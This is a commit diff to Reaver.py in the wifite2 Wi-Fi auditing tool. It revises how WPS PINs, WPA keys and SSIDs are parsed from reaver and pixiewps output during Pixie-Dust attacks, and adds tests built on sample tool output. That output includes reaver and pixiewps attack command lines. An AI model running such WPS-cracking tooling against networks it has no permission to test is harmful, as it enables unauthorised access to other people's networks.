Trying to fix bully & reaver Pixie-Dust attacks.
Haven't even looked at PIN attacks yet. Hopefully helps out with #28
This commit is contained in:
derv82
104
py/Reaver.py
104
py/Reaver.py
@@ -70,7 +70,7 @@ class Reaver(Attack):
|
||||
(pin, psk, ssid) = self.get_pin_psk_ssid(stdout)
|
||||
|
||||
# Check if we cracked it, or if process stopped.
|
||||
if (pin and psk and ssid) or reaver.poll() is not None:
|
||||
if pin is not None or reaver.poll() is not None:
|
||||
reaver.interrupt()
|
||||
|
||||
# Check one-last-time for PIN/PSK/SSID, in case of race condition.
|
||||
@@ -78,11 +78,12 @@ class Reaver(Attack):
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(stdout)
|
||||
|
||||
# Check if we cracked it.
|
||||
if pin and psk and ssid:
|
||||
if pin is not None:
|
||||
# We cracked it.
|
||||
bssid = self.target.bssid
|
||||
Color.clear_entire_line()
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}\n")
|
||||
Color.pattack("WPS", airodump_target, "Pixie-Dust", "{G}successfully cracked WPS PIN and PSK{W}")
|
||||
Color.pl("")
|
||||
self.crack_result = CrackResultWPS(bssid, ssid, pin, psk)
|
||||
self.crack_result.dump()
|
||||
return True
|
||||
@@ -219,7 +220,11 @@ class Reaver(Attack):
|
||||
# CHECK FOR CRACK
|
||||
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(out)
|
||||
if pin and psk and ssid:
|
||||
if pin is not None:
|
||||
if psk is None:
|
||||
psk = ''
|
||||
elif ssid is None:
|
||||
ssid = target.essid
|
||||
# We cracked it.
|
||||
self.success = True
|
||||
Color.pl('\n{+} {G}successly cracked WPS PIN and PSK{W}\n')
|
||||
@@ -238,15 +243,14 @@ class Reaver(Attack):
|
||||
if match:
|
||||
# Reset failures on successful try
|
||||
failures = 0
|
||||
groups = match.groups()
|
||||
pin_current = int(groups[0])
|
||||
pin_total = int(groups[1])
|
||||
pin_current = int(match.group(1))
|
||||
pin_total = int(match.group(2))
|
||||
|
||||
# Reaver 1.3, 1.4
|
||||
match = None
|
||||
for match in re.finditer('Trying pin (\d+)', out):
|
||||
if match:
|
||||
pin = int(match.groups()[0])
|
||||
pin = int(match.group(1))
|
||||
if pin not in pins:
|
||||
# Reset failures on successful try
|
||||
failures = 0
|
||||
@@ -282,14 +286,14 @@ class Reaver(Attack):
|
||||
|
||||
match = re.search('Estimated Remaining time: ([a-zA-Z0-9]+)', out)
|
||||
if match:
|
||||
eta = match.groups()[0]
|
||||
eta = match.group(1)
|
||||
state = '{C}cracking, ETA: {G}%s{W}' % eta
|
||||
|
||||
match = re.search('Max time remaining at this rate: ([a-zA-Z0-9:]+)..([0-9]+) pins left to try', out)
|
||||
if match:
|
||||
eta = match.groups()[0]
|
||||
eta = match.group(1)
|
||||
state = '{C}cracking, ETA: {G}%s{W}' % eta
|
||||
pins_left = int(match.groups()[1])
|
||||
pins_left = int(match.group(2))
|
||||
|
||||
# Divine pin_current & pin_total from this:
|
||||
pin_current = 11000 - pins_left
|
||||
@@ -341,24 +345,29 @@ class Reaver(Attack):
|
||||
pin = psk = ssid = None
|
||||
|
||||
# Check for PIN.
|
||||
# PIN: Printed *before* the attack completes.
|
||||
regex = re.search('WPS pin: *([0-9]*)', stdout)
|
||||
''' [+] WPS pin: 11867722'''
|
||||
regex = re.search(r"WPS pin:\s*([0-9]*)", stdout, re.IGNORECASE)
|
||||
if regex:
|
||||
pin = regex.groups()[0]
|
||||
# PIN: Printed when attack is completed.
|
||||
regex = re.search("WPS PIN: *'([0-9]+)'", stdout)
|
||||
if regex:
|
||||
pin = regex.groups()[0]
|
||||
pin = regex.group(1)
|
||||
|
||||
# Check for PSK.
|
||||
# Note: Reaver 1.6.x does not appear to return PSK (?)
|
||||
regex = re.search("WPA PSK: *'(.+)'", stdout)
|
||||
if regex:
|
||||
psk = regex.groups()[0]
|
||||
psk = regex.group(1)
|
||||
|
||||
# Check for SSID
|
||||
regex = re.search("AP SSID: *'(.+)'", stdout)
|
||||
"""1.x [Reaver Test] [+] AP SSID: 'Test Router' """
|
||||
regex = re.search(r"AP SSID:\s*'(.*)'", stdout)
|
||||
if regex:
|
||||
ssid = regex.groups()[0]
|
||||
ssid = regex.group(1)
|
||||
|
||||
# Check (again) for SSID
|
||||
if ssid is None:
|
||||
"""1.6.x [+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)"""
|
||||
regex = re.search(r"Associated with [0-9A-F:]+ \(ESSID: (.*)\)", stdout)
|
||||
if regex:
|
||||
ssid = regex.group(1)
|
||||
|
||||
return (pin, psk, ssid)
|
||||
|
||||
@@ -372,7 +381,7 @@ class Reaver(Attack):
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
stdout = '''
|
||||
old_stdout = '''
|
||||
[Pixie-Dust]
|
||||
[Pixie-Dust] Pixiewps 1.1
|
||||
[Pixie-Dust]
|
||||
@@ -390,7 +399,52 @@ Cmd : reaver -i wlan0mon -b 08:86:3B:8C:FD:9C -c 11 -s y -vv -p 28097402
|
||||
[Reaver Test] [+] WPS PIN: '12345678'
|
||||
[Reaver Test] [+] WPA PSK: 'Test PSK'
|
||||
[Reaver Test] [+] AP SSID: 'Test Router'
|
||||
'''
|
||||
print Reaver.get_pin_psk_ssid(stdout)
|
||||
pass
|
||||
'''
|
||||
|
||||
# From vom513 in https://github.com/derv82/wifite2/issues/60
|
||||
new_stdout = '''
|
||||
[+] Switching wlan1mon to channel 5
|
||||
[+] Waiting for beacon from EC:1A:59:37:70:0E
|
||||
[+] Received beacon from EC:1A:59:37:70:0E
|
||||
[+] Vendor: RealtekS
|
||||
[+] Trying pin "12345670"
|
||||
[+] Sending authentication request
|
||||
[+] Sending association request
|
||||
[+] Associated with EC:1A:59:37:70:0E (ESSID: belkin.00e)
|
||||
[+] Sending EAPOL START request
|
||||
[+] Received identity request
|
||||
[+] Sending identity response
|
||||
[+] Received M1 message
|
||||
[+] Sending M2 message
|
||||
|
||||
Pixiewps 1.4
|
||||
|
||||
[?] Mode: 3 (RTL819x)
|
||||
[*] Seed N1: -
|
||||
[*] Seed ES1: -
|
||||
[*] Seed ES2: -
|
||||
[*] PSK1: 2c2e33f5e3a870759f0aeebbd2792450
|
||||
[*] PSK2: 3f4ca4ea81b2e8d233a4b80f9d09805d
|
||||
[*] ES1: 04d48dc20ec785762ce1a21a50bc46c2
|
||||
[*] ES2: 04d48dc20ec785762ce1a21a50bc46c2
|
||||
[+] WPS pin: 11867722
|
||||
|
||||
[*] Time taken: 0 s 21 ms
|
||||
|
||||
executing pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 5a67001334e3e4cb236f4e134a4d3b48d625a648e991f978d9aca879469d5da5 -z c8a2ccc5fb6dc4f4d69b245091022dc7e998e42ec1d548d57c35a312ff63ef20 -a 60b59c0c587c6c44007f7081c3372489febbe810a97483f5cc5cd8463c3920de -n 04d48dc20ec785762ce1a21a50bc46c2 -r 7a191e22a7b519f40d3af21b93a21d4f837718b45063a8a69ac6d16c6e5203477c18036ca01e9e56d0322e70c2e1baa66518f1b46d01acc577d1dfa34efd2e9ee36e2b7e68819cddacceb596a8895243e33cb48c570458a539dcb523a4d4c4360e158c29b882f7f385821ea043705eb56538b45daa445157c84e60fc94ef48136eb4e9725b134902b96c90b1ae54cbd42b29b52611903fdae5aa88bfc320f173d2bbe31df4996ebdb51342c6b8bd4e82ae5aa80b2a09a8bf8faa9a8332dc9819
|
||||
'''
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(old_stdout)
|
||||
assert pin == '12345678', 'pin was "%s", should have been "12345678"' % pin
|
||||
assert psk == 'Test PSK', 'psk was "%s", should have been "Test PSK"' % psk
|
||||
assert ssid == "Test Router", 'ssid was %s, should have been Test Router' % repr(ssid)
|
||||
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
||||
result.dump()
|
||||
|
||||
print ""
|
||||
|
||||
(pin, psk, ssid) = Reaver.get_pin_psk_ssid(new_stdout)
|
||||
assert pin == '11867722', 'pin was "%s", should have been "11867722"' % pin
|
||||
assert psk == None, 'psk was "%s", should have been "None"' % psk
|
||||
assert ssid == "belkin.00e", 'ssid was "%s", should have been "belkin.00e"' % repr(ssid)
|
||||
result = CrackResultWPS('AA:BB:CC:DD:EE:FF', ssid, pin, psk)
|
||||
result.dump()
|
||||
|
||||
Reference in New Issue
Block a user